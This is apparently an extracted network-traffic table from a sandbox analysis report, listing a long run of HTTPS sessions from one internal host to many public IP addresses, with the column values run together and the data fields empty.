                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14847192.168.2.135745673.127.37.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14848192.168.2.135924662.158.45.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14849192.168.2.1355568107.237.101.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14850192.168.2.134696664.118.67.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14851192.168.2.135580098.144.19.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14852192.168.2.1354926217.61.2.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14853192.168.2.1343612117.60.240.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14854192.168.2.134663837.167.94.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14855192.168.2.133849232.148.44.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14856192.168.2.1354438158.44.57.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14857192.168.2.1349172206.185.88.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14858192.168.2.1348262125.177.172.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14859192.168.2.1354628206.104.26.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14860192.168.2.1336648202.1.88.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14861192.168.2.1336398201.93.117.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14862192.168.2.1339860122.20.217.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14863192.168.2.1336976197.156.42.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14864192.168.2.1339442219.241.51.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14865192.168.2.135498271.109.112.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14866192.168.2.1358716135.96.107.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14867192.168.2.134382493.23.95.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14868192.168.2.1337204178.136.236.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14869192.168.2.134613287.201.131.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14870192.168.2.13536582.32.139.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14871192.168.2.1339234196.23.180.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14872192.168.2.134225624.70.143.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14873192.168.2.1335394179.63.73.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14874192.168.2.1349950122.231.191.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14875192.168.2.1344450169.220.59.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14876192.168.2.1348184223.128.24.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14877192.168.2.1341692194.241.172.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14878192.168.2.134921295.205.150.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14879192.168.2.1351312221.47.244.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14880192.168.2.1344426140.1.124.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14881192.168.2.1357998102.215.249.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14882192.168.2.1349726194.27.196.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14883192.168.2.133310691.19.29.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14884192.168.2.1356698193.99.44.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14885192.168.2.135719671.10.132.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14886192.168.2.1345148165.10.215.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14887192.168.2.1349554209.231.186.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14888192.168.2.134001214.226.90.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14889192.168.2.133970273.194.93.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14890192.168.2.134292857.187.29.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14891192.168.2.1356504102.51.121.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14892192.168.2.134011675.201.158.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14893192.168.2.135183678.179.223.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14894192.168.2.134964824.82.125.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14895192.168.2.1348972216.198.195.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14896192.168.2.134411452.149.111.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14897192.168.2.1352102171.11.78.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14898192.168.2.1346542183.54.30.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14899192.168.2.1334310180.161.18.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14900192.168.2.1353960216.214.146.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14901192.168.2.1354030167.194.57.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14902192.168.2.1348560151.106.31.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14903192.168.2.134825266.79.43.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14904192.168.2.1353726169.135.231.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14905192.168.2.1339238207.192.91.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14906192.168.2.134554490.50.17.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14907192.168.2.134634897.52.210.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14908192.168.2.135077219.170.187.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14909192.168.2.1352848160.59.138.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14910192.168.2.133735082.142.69.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14911192.168.2.135243090.78.73.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14912192.168.2.1358176179.151.101.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14913192.168.2.1336740128.14.238.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14914192.168.2.1334590155.75.188.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14915192.168.2.1345906199.145.224.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14916192.168.2.1353052114.144.112.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14917192.168.2.1341056112.36.84.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14918192.168.2.1349928163.60.189.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14919192.168.2.1360018201.105.152.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14920192.168.2.134601699.37.69.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14921192.168.2.1350708165.132.54.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14922192.168.2.1354402146.184.211.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14923192.168.2.135434271.128.219.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14924192.168.2.1339976103.222.158.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14925192.168.2.1347412205.245.79.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14926192.168.2.1346264124.115.116.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14927192.168.2.135474844.173.238.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14928192.168.2.1355502137.34.43.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14929192.168.2.1333494185.195.245.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14930192.168.2.1336556138.76.186.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14931192.168.2.1348248154.216.247.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14932192.168.2.135646490.85.154.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14933192.168.2.1344990137.246.255.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14934192.168.2.135785251.251.5.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14935192.168.2.134413047.104.22.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14936192.168.2.1351582123.126.230.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14937192.168.2.1337218114.188.177.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14938192.168.2.13376144.31.247.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14939192.168.2.1336460173.244.168.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14940192.168.2.1345688219.203.1.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14941192.168.2.135555289.17.75.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14942192.168.2.134195462.97.69.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14943192.168.2.135965299.228.126.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14944192.168.2.135771820.200.147.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14945192.168.2.134176839.172.116.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14946192.168.2.134074420.214.85.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14947192.168.2.135005248.172.60.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14948192.168.2.133597460.132.177.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14949192.168.2.1334642208.198.84.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14950192.168.2.1359300128.169.58.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14951192.168.2.1336650185.0.115.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14952192.168.2.1344394163.171.77.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14953192.168.2.134949879.144.190.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14954192.168.2.1353766183.109.66.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14955192.168.2.1357226175.121.222.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14956192.168.2.1354134102.177.178.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14957192.168.2.133704847.155.227.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14958192.168.2.1348858161.112.106.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14959192.168.2.135738850.247.152.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14960192.168.2.1358180108.12.92.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14961192.168.2.1354274146.63.139.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14962192.168.2.1341158211.98.217.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14963192.168.2.135610279.40.190.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14964192.168.2.1358588160.246.194.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14965192.168.2.1346594114.143.229.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14966192.168.2.1339736129.154.159.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14967192.168.2.1351594221.101.176.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14968192.168.2.1349326220.249.93.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14969192.168.2.1338160204.170.216.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14970192.168.2.1359066144.208.87.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14971192.168.2.135020899.223.9.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14972192.168.2.1340214112.59.141.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14973192.168.2.134068254.85.154.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14974192.168.2.134091244.64.29.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14975192.168.2.135911234.119.235.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14976192.168.2.135502063.86.38.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14977192.168.2.1334842150.208.10.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14978192.168.2.1344086112.173.95.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14979192.168.2.1354990169.94.135.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14980192.168.2.1343080201.202.134.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14981192.168.2.1358512222.191.143.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14982192.168.2.135623862.122.80.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14983192.168.2.1354986175.254.154.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14984192.168.2.135571467.199.226.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14985192.168.2.1341730223.56.34.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14986192.168.2.133920057.40.26.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14987192.168.2.1345616167.226.70.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14988192.168.2.1336588188.20.164.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14989192.168.2.1344798176.50.26.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14990192.168.2.1352640191.155.252.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14991192.168.2.1355886219.156.224.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14992192.168.2.134086859.49.252.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14993192.168.2.133434281.111.0.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14994192.168.2.1336814203.77.241.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14995192.168.2.1349826166.140.1.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14996192.168.2.133889072.213.25.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14997192.168.2.1333256218.61.156.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14998192.168.2.1349480144.182.192.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14999192.168.2.134874839.114.209.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15000192.168.2.134578450.181.64.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15001192.168.2.1357992128.134.211.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15002192.168.2.135810042.199.126.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15003192.168.2.1348688130.122.68.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15004192.168.2.1339612104.246.161.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15005192.168.2.134733682.174.52.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15006192.168.2.1355146205.140.46.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15007192.168.2.134765449.99.56.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15008192.168.2.1355160131.107.117.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15009192.168.2.134428271.60.168.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15010192.168.2.133782044.9.109.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15011192.168.2.1333388203.65.128.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15012192.168.2.133938847.211.217.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15013192.168.2.1333446120.65.3.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15014192.168.2.1334438108.212.212.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15015192.168.2.1342330213.8.128.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15016192.168.2.1347400142.40.118.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15017192.168.2.134465220.195.224.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15018192.168.2.1345034114.223.147.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15019192.168.2.1342998115.46.149.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15020192.168.2.1346712135.81.114.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15021192.168.2.1337718165.13.242.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15022192.168.2.1359154142.177.237.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15023192.168.2.135136072.73.217.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15024192.168.2.134144657.21.5.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15025192.168.2.1338708211.122.194.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15026192.168.2.1357752202.33.203.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15027192.168.2.133558288.254.71.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15028192.168.2.1340286190.198.33.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15029192.168.2.1351720169.198.208.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15030192.168.2.1339790150.91.40.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15031192.168.2.133758032.193.48.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15032192.168.2.1338494120.165.43.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15033192.168.2.1335794194.52.166.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15034192.168.2.1353194143.182.78.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15035192.168.2.1345676169.98.246.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15036192.168.2.1340246140.189.157.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15037192.168.2.1344278111.77.83.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15038192.168.2.1360646172.47.58.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15039192.168.2.133696885.95.42.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15040192.168.2.134327450.22.87.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15041192.168.2.1359844179.98.0.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15042192.168.2.1344868223.90.19.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15043192.168.2.1353458194.87.204.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15044192.168.2.1356768198.134.132.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15045192.168.2.133382475.17.4.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15046192.168.2.134220067.46.107.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15047192.168.2.1345474223.97.221.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15048192.168.2.135774647.22.209.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15049192.168.2.13587928.47.157.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15050192.168.2.134738254.16.150.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15051192.168.2.1358444104.172.153.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15052192.168.2.1359582206.66.100.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15053192.168.2.1341692113.251.15.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15054192.168.2.135988862.213.23.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15055192.168.2.135931854.41.165.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15056192.168.2.133335850.51.245.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15057192.168.2.1358596199.222.216.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15058192.168.2.134347291.43.133.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15059192.168.2.135827445.122.194.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15060192.168.2.135005665.59.175.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15061192.168.2.1351840181.191.156.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15062192.168.2.134666264.155.27.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15063192.168.2.1333854161.168.141.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15064192.168.2.1340346149.136.234.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15065192.168.2.1343462110.142.83.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15066192.168.2.1344524210.185.219.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15067192.168.2.1342944138.190.155.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
